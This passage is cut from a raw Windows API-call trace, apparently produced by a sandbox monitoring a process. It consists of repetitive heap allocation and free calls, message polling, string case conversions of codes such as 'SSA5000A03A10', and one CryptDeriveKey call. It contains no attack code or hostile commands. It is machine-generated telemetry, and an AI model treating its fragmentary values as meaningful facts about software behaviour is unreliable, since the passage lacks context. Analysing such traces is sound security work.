wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0204.394] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0204.395] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0204.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0204.395] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0204.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0204.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.396] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0204.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0204.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0204.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0204.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0204.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0204.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0204.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0204.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0204.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0204.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.407] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0204.407] RtlAllocateHeap 